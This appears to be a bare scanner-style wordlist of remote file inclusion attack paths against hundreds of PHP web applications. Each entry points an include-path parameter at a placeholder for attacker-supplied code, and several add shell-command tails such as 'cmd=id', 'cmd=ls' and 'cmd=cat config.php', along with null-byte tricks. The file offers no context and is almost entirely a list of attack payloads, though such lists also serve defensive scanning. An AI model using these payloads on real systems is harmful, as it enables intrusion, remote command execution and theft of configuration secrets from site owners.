/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX /modules/emails/index.php?full_path=XXpathXX /modules/events/index.php?full_path=XXpathXX /modules/fax/index.php?full_path=XXpathXX /modules/files/blocks/latest_files.php?system[path]=XXpathXX /modules/files/index.php?full_path=XXpathXX /modules/files/list.php?full_path=XXpathXX /modules/filters/headerfile.php?system[path]=XXpathXX /modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=XXpathXX? /modules/forums/blocks/latest_posts.php?system[path]=XXpathXX /modules/global/inc/content.inc.php?sIncPath=XXpathXX? /modules/groupadm/index.php?full_path=XXpathXX /modules/groups/headerfile.php?system[path]=XXpathXX /modules/guestbook/index.php?CONFIG[local_root]=XXpathXX? /modules/history/index.php?full_path=XXpathXX /modules/home.module.php?repmod=XXpathXX? /modules/horoscope/footer.php?xoopsConfig[root_path]=XXpathXX /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=XXpathXX /modules/info/index.php?full_path=XXpathXX /modules/links/blocks/links.php?system[path]=XXpathXX /modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX /modules/links/submit_links.php?rootdp=zZz&gsLanguage=XXpathXX /modules/log/index.php?full_path=XXpathXX /modules/mail/index.php?full_path=XXpathXX /modules/menu/headerfile.php?system[path]=XXpathXX /modules/messages/index.php?full_path=XXpathXX /modules/mod_as_category.php?mosConfig_absolute_path=XXpathXX /modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=XXpathXX /modules/mod_calendar.php?absolute_path=XXpathXX /modules/mod_flatmenu.php?mosConfig_absolute_path=XXpathXX /modules/mod_mainmenu.php?mosConfig_absolute_path=XXpathXX /modules/mod_weather.php?absolute_path=XXpathXX? /modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=XXpathXX? /modules/newbb_plus/config.php?bbPath[root_theme]=XXpathXX /modules/newbb_plus/votepolls.php?bbPath[path]=XXpathXX /modules/news/blocks/latest_news.php?system[path]=XXpathXX /modules/newusergreatings/pm_newreg.php?exbb[home_path]=XXpathXX? /modules/organizations/index.php?full_path=XXpathXX /modules/phones/index.php?full_path=XXpathXX /modules/pms/index.php?module_path=XXpathXX??? /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX /modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=XXpathXX? /modules/presence/index.php?full_path=XXpathXX /modules/projects/index.php?full_path=XXpathXX /modules/projects/list.php?full_path=XXpathXX /modules/projects/summary.inc.php?full_path=XXpathXX /modules/punish/p_error.php?exbb[home_path]=XXpathXX? /modules/punish/profile.php?exbb[home_path]=XXpathXX? /modules/reports/index.php?full_path=XXpathXX /modules/search/index.php?full_path=XXpathXX /modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX? /modules/settings/headerfile.php?system[path]=XXpathXX /modules/snf/index.php?full_path=XXpathXX /modules/syslog/index.php?full_path=XXpathXX /modules/tasks/index.php?full_path=XXpathXX /modules/tasks/searchsimilar.php?full_path=XXpathXX /modules/tasks/summary.inc.php?full_path=XXpathXX /modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX? /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX /modules/tml/block.tag.php?GLOBALS[PTH][classes]=XXpathXX /modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=XXpathXX /modules/useradm/index.php?full_path=XXpathXX /modules/users/headerfile.php?system[path]=XXpathXX /modules/vWar_Account/includes/functions_common.php?vwar_root2=XXpathXX /modules/visitors2/include/config.inc.php?lvc_include_dir=XXpathXX? /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=XXpathXX /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=XXpathXX /modules/xfsection/modify.php?dir_module=XXpathXX /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=XXpathXX /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX? /modulistica/mdl_save.php?CLASSPATH=XXpathXX /modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX? /moodle/admin/utfdbmigrate.php?cmd=XXpathXX /moosegallery/display.php?type=XXpathXX?&cmd=[command] /mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=XXpathXX /moteur/moteur.php?chemin=XXpathXX? /movie_cls.php?full_path=XXpathXX /msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX /music/buycd.php?HTTP_DOCUMENT_ROOT=XXpathXX? /mutant_includes/mutant_functions.php?phpbb_root_path=XXpathXX /mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=XXpathXX /mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=XXpathXX /mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX /myphpcommander_path/system/lib/package.php?gl_root=XXpathXX?cmd /mysave.php?file=XXpathXX /naboard_pnr.php?skin=XXpathXX? /ncaster/admin/addons/archive/archive.php?adminfolder=XXpathXX /network_module_selector.php?path_prefix=XXpathXX /news.php?CONFIG[script_path]=XXpathXX? /news.php?config[root_ordner]=XXpathXX?&cmd=id /news.php?scriptpath=XXpathXX? /news.php?vwar_root=XXpathXX /news/include/createdb.php?langfile;=XXpathXX? /news/include/customize.php?l=XXpathXX? /news/newstopic_inc.php?indir=XXpathXX /news/scripts/news_page.php?script_path=XXpathXX? /newsadmin.php?action=XXpathXX /newsarchive.php?path_to_script=XXpathXX?&cmd=ls /newsfeeds/includes/aggregator.php?zf_path=XXpathXX /newsfeeds/includes/controller.php?zf_path=XXpathXX /newsletter/newsletter.php?waroot=XXpathXX /newsp/lib/class.Database.php?path=XXpathXX? /newticket.php?lang=XXpathXX /noah/modules/noevents/templates/mfa_theme.php?tpls[1]=XXpathXX /noticias.php?inc=XXpathXX? /nucleus/plugins/skinfiles/index.php?DIR_LIBS=XXpathXX /nuke_path/iframe.php?file=XXpathXX /nukebrowser.php?filnavn=XXpathXX&filhead=XXpathXX&cmd=id /nuseo/admin/nuseo_admin_d.php?nuseo_dir=XXpathXX? /oaboard_en/forum.php?inc=XXpathXX /ocp-103/index.php?req_path=XXpathXX /ocs/include/footer.inc.php?fullpath=XXpathXX? /ocs/include/theme.inc.php?fullpath=XXpathXX? /ocs/openemr-2.8.2/custom/import_xml.php?srcdir=XXpathXX? /olbookmarks-0.7.4/themes/test1.php?XXpathXX /oneadmin/adminfoot.php?path[docroot]=XXpathXX /oneadmin/blogger/sampleblogger.php?path[docroot]=XXpathXX? /oneadmin/config-bak.php?include_once=XXpathXX /oneadmin/config.php?path[docroot]=XXpathXX /oneadmin/ecommerce/sampleecommerce.php?path[docroot]=XXpathXX? /online.php?config[root_ordner]=XXpathXX?&cmd=id /open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=XXpathXX? /openi-admin/base/fileloader.php?config[openi_dir]=XXpathXX /openrat/themes/default/include/html/insert.inc.php?tpl_dir=XXpathXX??? /opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=XXpathXX /ops/gals.php?news_file=XXpathXX /order/login.php?svr_rootscript=XXpathXX /osData/php121/php121db.php?php121dir=XXpathXX%00 /ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=XXpathXX? /ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=XXpathXX? /owimg.php3?path=XXpathXX /p-news.php?pn_lang=XXpathXX /pafiledb/includes/pafiledb_constants.php?module_root_path=XXpathXX /page.php?goto=XXpathXX /page.php?id=XXpathXX /panel/common/theme/default/header_setup.php?path[docroot]=XXpathXX /param_editor.php?folder=XXpathXX? /parse/parser.php?WN_BASEDIR=XXpathXX /patch/?language_id=XXpathXX /patch/tools/send_reminders.php?noSet=0&includedir=XXpathXX? /paypalipn/ipnprocess.php?INC=XXpathXX? /pda/pda_projects.php?offset=XXpathXX /phfito/phfito-post?SRC_PATH=XXpathXX /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=XXpathXX /photo_comment.php?toroot=XXpathXX /php-inc/log.inc.php?SKIN_URL=XXpathXX /php-include-robotsservices.php?page=XXpathXX /php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX /php.incs/common.inc.php?cm_basedir=XXpathXX? /php/init.gallery.php?include_class=XXpathXX/something /php121db.php?php121dir=XXpathXX%00 /php4you.php?dir=XXpathXX? /phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=XXpathXX? /phpBB2/shoutbox.php?phpbb_root_path=XXpathXX /phpCards.header.php?CardPath=XXpathXX? /phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX /phpMyChat.php3?=XXpathXX?cmd=id /phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=XXpathXX? /phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=XXpathXX? /phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX /phpbb/sendmsg.php?phpbb_root_path=XXpathXX /phpcalendar/includes/calendar.php?phpc_root_path=XXpathXX? /phpcalendar/includes/setup.php?phpc_root_path=XXpathXX? /phpdebug_PATH/test/debug_test.php?debugClassLocation=XXpathXX /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=XXpathXX /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=XXpathXX /phphd_downloads/common.php?phphd_real_path=XXpathXX /phphost_directoryv2/include/admin.php?rd=XXpathXX? /phphtml.php?htmlclass_path=XXpathXX /phpi/edit_top_feature.php?include_connection=XXpathXX /phpi/edit_topics_feature.php?include_connection=XXpathXX /phplib/site_conf.php?ordnertiefe=XXpathXX /phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=XXpathXX /phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=XXpathXX /phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=XXpathXX /phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=XXpathXX /phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=XXpathXX /phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=XXpathXX /phplib/version/1.3.3/module/referenz.php?tt_docroot=XXpathXX /phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=XXpathXX /phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=XXpathXX /phplib/version/1.3.3/standard/1/lay.php?tt_docroot=XXpathXX /phplib/version/1.3.3/standard/3/lay.php?tt_docroot=XXpathXX /phplinks/includes/smarty.php?full_path_to_public_program=XXpathXX /phporacleview/inc/include_all.inc.php?page_dir=XXpathXX? /phppc/poll.php?is_phppc_included=1&relativer_pfad=XXpathXX? /phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=XXpathXX? /phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=XXpathXX? /phpquickgallery/gallery_top.inc.php?textFile=XXpathXX /phpreactor/inc/polls.inc.php?pathtohomedir=XXpathXX? /phpreactor/inc/updatecms.inc.php?pathtohomedir=XXpathXX? /phpreactor/inc/users.inc.php?pathtohomedir=XXpathXX? /phpreactor/inc/view.inc.php?pathtohomedir=XXpathXX? /phpress/adisplay.php?lang=XXpathXX /phpunity-postcard.php?plgallery_epost=1&gallery_path=XXpathXX? /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=XXpathXX /phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=XXpathXX /phpyabs/moduli/libri/index.php?Azione=XXpathXX /pirvate/ltwpdfmonth.php?ltw_config['include_dir]=XXpathXX /playlist.php?phpbb_root_path=XXpathXX /plugin/HP_DEV/cms2.php?s_dir=XXpathXX? /plugin/gateway/gnokii/init.php?apps_path[plug]=XXpathXX? /plugins/1_Adressbuch/delete.php?folder=XXpathXX /plugins/BackUp/Archive.php?bkpwp_plugin_path=XXpathXX? /plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=XXpathXX? /plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=XXpathXX? /plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=XXpathXX? /plugins/links/functions.inc?_CONF[path]=XXpathXX /plugins/polls/functions.inc?_CONF[path]=XXpathXX /plugins/rss_importer_functions.php?sitepath=XXpathXX? /plugins/safehtml/HTMLSax3.php?dir[plugins]=XXpathXX? /plugins/safehtml/safehtml.php?dir[plugins]=XXpathXX? /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=XXpathXX /plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=XXpathXX /plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=XXpathXX /plugins/spamx/EditIP.Admin.class.php?_CONF[path]=XXpathXX /plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=XXpathXX /plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=XXpathXX /plugins/spamx/Import.Admin.class.php?_CONF[path]=XXpathXX /plugins/spamx/LogView.Admin.class.php?_CONF[path]=XXpathXX /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=XXpathXX /plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=XXpathXX /plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=XXpathXX /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=XXpathXX /plugins/staticpages/functions.inc?_CONF[path]=XXpathXX /plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=XXpathXX /plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=XXpathXX /plus.php?_pages_dir=XXpathXX? /pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=XXpathXX? /pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX /pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX? /podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=XXpathXX /podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=XXpathXX /podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=XXpathXX /podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=XXpathXX /podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=XXpathXX /podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=XXpathXX /podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=XXpathXX /podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=XXpathXX /podcastgen1.0beta2/core/admin/login.php?absoluteurl=XXpathXX /podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=XXpathXX /podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=XXpathXX /podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=XXpathXX /podcastgen1.0beta2/core/archive_cat.php?absoluteurl=XXpathXX /podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=XXpathXX /podcastgen1.0beta2/core/recent_list.php?absoluteurl=XXpathXX /poll/view.php?int_path=XXpathXX /pollvote.php?pollname=XXpathXX?&cmd=ls /pop.php?base=XXpathXX /popup_window.php?site_isp_root=XXpathXX? /port.php?content=XXpathXX /portal/includes/portal_block.php?phpbb_root_path=XXpathXX /portal/portal.php?phpbb_root_path=XXpathXX? /portfolio.php?id=XXpathXX /portfolio/commentaires/derniers_commentaires.php?rep=XXpathXX? /post_static_0-11/_lib/fckeditor/upload_config.php?DDS=XXpathXX /prepare.php?xcart_dir=XXpathXX? /prepend.php?_PX_config[manager_path]=XXpathXX /preview.php?php_script_path=XXpathXX?&cmd=dir /principal.php?conteudo=XXpathXX /print.php?page=XXpathXX /print.php?pager=XXpathXX /print.php?print=XXpathXX? /process.php?DEFAULT_SKIN=XXpathXX /professeurs/index.php?repertoire_config=XXpathXX /profil.php?config[root_ordner]=XXpathXX?&cmd=id /projects/weatimages/demo/index.php?ini[langpack]=XXpathXX /promocms/newspublish/include.php?path[bdocroot]=XXpathXX /protection.php?logout_page=XXpathXX? /provider/auth.php?xcart_dir=XXpathXX? /psynch/nph-psa.exe?css=XXpathXX /psynch/nph-psf.exe?css=XXpathXX /public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=XXpathXX? /public_html/modules/Forums/favorites.php?nuke_bb_root_path=XXpathXX? /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=XXpathXX /public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=XXpathXX /qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=XXpathXX? /qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=XXpathXX? /qte_web.php?qte_web_path=XXpathXX? /quick_reply.php?phpbb_root_path=XXpathXX&mode=[file] /quickie.php?QUICK_PATH=XXpathXX?&cmd=id /random2.php?path_to_folder=XXpathXX /randshop/index.php?incl=XXpathXX? /rdf.php?page[path]=XXpathXX?&cmd=ls /reactivate.php?base_dir=XXpathXX /read.php?data=XXpathXX? /readmore.php?config["sipssys"]=XXpathXX /recent.php?insPath=XXpathXX /rechnung.php?_PHPLIB[libdir]=XXpathXX? /reconfig.php?GLOBALS[CLPath]=XXpathXX /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=XXpathXX /redirect.php?url=XXpathXX /redsys/404.php?REDSYS[MYPATH][TEMPLATES]=XXpathXX /register.php?base_dir=XXpathXX /releasenote.php?mosConfig_absolute_path=XXpathXX /rempass.php?lang=XXpathXX /report.php?scriptpath=XXpathXX? /reports/who_r.php?bj=XXpathXX /resources/includes/class.Smarty.php?cfg[sys][base_path]=XXpathXX /ressourcen/dbopen.php?home=XXpathXX? /robotstats.inc.php?DOCUMENT_ROOT=XXpathXX? /root/public/code/cp_html2txt.php?page=XXpathXX /routines/fieldValidation.php?jssShopFileSystem=XXpathXX /rspa/framework/Controller_v4.php?__ClassPath=XXpathXX /rspa/framework/Controller_v4.php?__ClassPath=XXpathXX? /rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX /rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX? /rss.php?page[path]=XXpathXX?&cmd=ls /rss.php?phpraid_dir=XXpathXX /rss.php?premodDir=XXpathXX /rss2.php?page[path]=XXpathXX?&cmd=ls /run.php?dir=SHELL?&file=XXpathXX /s01.php?shopid=XXpathXX /s01.php?shopid=XXpathXX? /s02.php?shopid=XXpathXX? /s03.php?shopid=XXpathXX? /s04.php?shopid=XXpathXX? /sablonlar/gunaysoft/gunaysoft.php?icerikyolu=XXpathXX /sablonlar/gunaysoft/gunaysoft.php?sayfaid=XXpathXX /saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX /saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX? /sample/xls2mysql/parser_path=XXpathXX? /save.php?file_save=XXpathXX /saveserver.php?thisdir=XXpathXX /script//ident/index.php?path_inc=XXpathXX /script/_conf/core/common-tpl-vars.php?confdir=XXpathXX? /script/common.inc.php?path_inc=XXpathXX /script/gestion/index.php?path_inc=XXpathXX /script/ident/disconnect.php?path_inc=XXpathXX /script/ident/ident.inc.php?path_inc=XXpathXX /script/ident/identification.php?path_inc=XXpathXX /script/ident/loginliste.php?path_inc=XXpathXX /script/ident/loginmodif.php?path_inc=XXpathXX /script/index.php?path_inc=XXpathXX /script/init/createallimagecache.php?PATH_TO_CODE=XXpathXX /script/menu/menuadministration.php?path_inc=XXpathXX /script/menu/menuprincipal.php?path_inc=XXpathXX /script/param/param.inc.php?path_inc=XXpathXX /script/plugins/phpgacl/admin/index.php?path_inc=XXpathXX /script/template/index.php?main_page_directory=XXpathXX /script/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX /script/tick/test.php?PATH_TO_CODE=XXpathXX /script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=XXpathXX? /script_path/cms/classes/openengine/filepool.php?oe_classpath=XXpathXX? /script_path/installation/index.php?mosConfig_absolute_path=XXpathXX? /script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=XXpathXX /scripts/check-lom.php?ETCDIR=XXpathXX /scripts/gallery.scr.php?GLOBALS[PTH][func]=XXpathXX? /scripts/lom_update.php?ETCDIR=XXpathXX /scripts/news.scr.php?GLOBALS[PTH][classes]=XXpathXX? /scripts/polls.scr.php?GLOBALS[PTH][classes]=XXpathXX? /scripts/rss.scr.php?GLOBALS[PTH][classes]=XXpathXX? /scripts/search.scr.php?GLOBALS[PTH][classes]=XXpathXX? /scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX /scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX? /scripts/weigh_keywords.php?ETCDIR=XXpathXX /scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=XXpathXX? /search.php?config["sipssys"]=XXpathXX /search.php?id=XXpathXX /search.php?insPath=XXpathXX /search/submit.php?config["sipssys"]=XXpathXX /search_wA.php?LIBPATH=XXpathXX /searchbot.php?path=XXpathXX /security/include/_class.security.php?PHPSECURITYADMIN_PATH=XXpathXX /sendstudio/admin/includes/createemails.inc.php?ROOTDIR=XXpathXX? /sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=XXpathXX? /senetman/html/index.php?page=XXpathXX /services.php?page=XXpathXX /services/samples/inclusionService.php?CabronServiceFolder=XXpathXX%00 /settings.php?P[includes]=XXpathXX /settings_sql.php?path=XXpathXX /setup/inc/database.php?tcms_administer_site=XXpathXX /setup/upgrader.php?RootDirectory=XXpathXX /sezhoo/SezHooTabsAndActions.php?IP=XXpathXX /shop/includes/header.inc.php?dateiPfad=XXpathXX /shop/index.php?action=XXpathXX?&cmd=cat%20config.php /shop/page.php?osCsid=XXpathXX? /shop/page.php?pageid=XXpathXX? /shoutbox.php?language=XXpathXX /shoutbox.php?root=XXpathXX?cmd=id /show.php?file=XXpathXX /show.php?id=XXpathXX /show.php?page=XXpathXX /show.php?path=XXpathXX /show_archives.php?cutepath=XXpathXX? /sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=XXpathXX /sid=XXpathXX /signer/final.php?smiley=XXpathXX? /signin.php?sent=1&AMG_serverpath=XXpathXX /sinagb.php?fuss=XXpathXX /sinapis.php?fuss=XXpathXX /sitebar/Integrator.php?file=XXpathXX /sitebar/index.php?writerFile=XXpathXX /sitebuilder/admin/top.php?admindir=XXpathXX /sitemap.xml.php?dir[classes]=XXpathXX /skin/board/default/doctype.php?dir=XXpathXX /skin/dark/template.php?path=XXpathXX /skin/gold/template.php?path=XXpathXX /skin/html/table.php?pachtofile=XXpathXX /skin/original/template.php?path=XXpathXX /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=XXpathXX /skins/advanced/advanced1.php?pluginpath[0]=XXpathXX /skins/default.php?dir_inc=XXpathXX /skins/header.php?ote_home=XXpathXX /skins/phpchess/layout_admin_cfg.php?Root_Path=XXpathXX /skins/phpchess/layout_cfg.php?Root_Path=XXpathXX /skins/phpchess/layout_t_top.php?Root_Path=XXpathXX /skysilver/login.tpl.php?theme=XXpathXX? /slogin_lib.inc.php?slogin_path=XXpathXX? /smarty.php?xcart_dir=XXpathXX? /smarty/smarty_class.php?_smarty_compile_path=XXpathXX /smilies.php?config=XXpathXX /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX? /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=XXpathXX? /snort/base_stat_common.php?BASE_path=XXpathXX /social_game_play.php?path=XXpathXX? /software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=XXpathXX /song.php?phpbb_root_path=XXpathXX /source.php?bibtexrootrel=XXpathXX? /source/mod/rss/channeledit.php?Codebase=XXpathXX /source/mod/rss/post.php?Codebase=XXpathXX /source/mod/rss/view.php?Codebase=XXpathXX /source/mod/rss/viewitem.php?Codebase=XXpathXX /sources/Admin/admin_cats.php?CONFIG[main_path]=XXpathXX /sources/Admin/admin_edit.php?CONFIG[main_path]=XXpathXX /sources/Admin/admin_import.php?CONFIG[main_path]=XXpathXX /sources/Admin/admin_templates.php?CONFIG[main_path]=XXpathXX /sources/functions.php?CONFIG[main_path]=XXpathXX /sources/help.php?CONFIG[main_path]=XXpathXX /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=XXpathXX /sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=XXpathXX /sources/mail.php?CONFIG[main_path]=XXpathXX /sources/misc/new_day.php?path=XXpathXX /sources/news.php?CONFIG[main_path]=XXpathXX /sources/post.php?fil_config=XXpathXX /sources/template.php?CONFIG[main_path]=XXpathXX /sources/tourney/index.php?page=XXpathXX? /spaw/spaw_control.class.php?GLOBALS[spaw_root]=XXpathXX /spaw/spaw_control.class.php?spaw_root=XXpathXX /speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=XXpathXX /speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX /speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX /speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=XXpathXX /speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=XXpathXX /speedberg/include/speedberg.class.php?SPEEDBERG_PATH=XXpathXX /speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=XXpathXX /spellcheckwindowframeset.php?SpellIncPath=XXpathXX /squirrelcart/cart_content.php?cart_isp_root=XXpathXX /src/ark_inc.php?cfg_pear_path=XXpathXX? /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=XXpathXX /src/scripture.php?pageHeaderFile=XXpathXX? /starnet/themes/c-sky/main.inc.php?cmsdir=XXpathXX? /start.php?lang=XXpathXX /start.php?pg=XXpathXX /stat_modules/users_age/module.php?phpbb_root_path=XXpathXX /stats.php?vwar_root=XXpathXX /stphpapplication.php?STPHPLIB_DIR=XXpathXX /stphpbtnimage.php?STPHPLIB_DIR=XXpathXX /stphpform.php?STPHPLIB_DIR=XXpathXX /str.php?p=XXpathXX /streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX /streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX? /strload.php?LangFile=XXpathXX /studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=XXpathXX? /studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=XXpathXX? /styles.php?toroot=XXpathXX /styles/default/global_header.php?installed=23&domain=XXpathXX /submit_abuse.php?path_prefix=XXpathXX /submit_comment.php?path_prefix=XXpathXX /subscp.php?phpbb_root_path=XXpathXX? /suite/index.php?pg=XXpathXX? /supasite/admin_auth_cookies.php?supa[db_path]=XXpathXX /supasite/admin_mods.php?supa[db_path]=XXpathXX /supasite/admin_news.php?supa[db_path]=XXpathXX /supasite/admin_settings.php?supa[include_path]=XXpathXX /supasite/admin_topics.php?supa[db_path]=XXpathXX /supasite/admin_users.php?supa[db_path]=XXpathXX /supasite/admin_utilities.php?supa[db_path]=XXpathXX /supasite/backend_site.php?supa[include_path]=XXpathXX /supasite/common_functions.php?supa[db_path]=XXpathXX /supasite/site_comment.php?supa[db_path]=XXpathXX /supasite/site_news.php?supa[db_path]=XXpathXX /support/include/open_form.php?include_dir=XXpathXX?cmd=pwd /support/index.php?main=XXpathXX /surveys/survey.inc.php?path=XXpathXX /sw/lib_comment/comment.php?doc_directory=XXpathXX? /sw/lib_find/find.php?doc_directory=XXpathXX? /sw/lib_session/session.php?doc_directory=XXpathXX? /sw/lib_up_file/file.php?doc_directory=XXpathXX? /sw/lib_up_file/find_file.php?doc_directory=XXpathXX? /sw/lib_user/find_user.php?doc_directory=XXpathXX? /sw/lib_user/user.php?doc_directory=XXpathXX? /sys/code/box.inc.php?config["sipssys"]=XXpathXX /system/ImageImageMagick.php?glConf[path_system]=XXpathXX? /system/_b/contentFiles/gBIndex.php?gBRootPath=XXpathXX? /system/admin/include/item_main.php?GLOBALS=XXpathXX /system/admin/include/upload_form.php?GLOBALS=XXpathXX /system/command/admin.cmd.php?GLOBALS=XXpathXX /system/command/download.cmd.php?GLOBALS=XXpathXX /system/funcs/xkurl.php?PEARPATH=XXpathXX /system/includes/pageheaderdefault.inc.php?_sysSessionPath=XXpathXX /system/login.php?site_path=XXpathXX /tagit2b/tagmin/delTagUser.php?configpath=XXpathXX? /tags.php?BBCodeFile=XXpathXX /taxonservice.php?dir=XXpathXX? /teatro/pub/pub08_comments.php?basePath=XXpathXX /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=XXpathXX? /template.php?actionsPage=XXpathXX? /template.php?blog_theme=XXpathXX /template.php?pagina=XXpathXX /template/Noir/index.php?site_path=XXpathXX /template/Vert/index.php?pageAll=XXpathXX /template/Vert/index.php?site_path=XXpathXX /template/barnraiser_01/p_new_password.tpl.php?templatePath=XXpathXX /template/default/footer.php?ROOT_PATH=XXpathXX?cmd=ls /template/default/test/header.php?ROOT_PATH=XXpathXX?cmd=ls 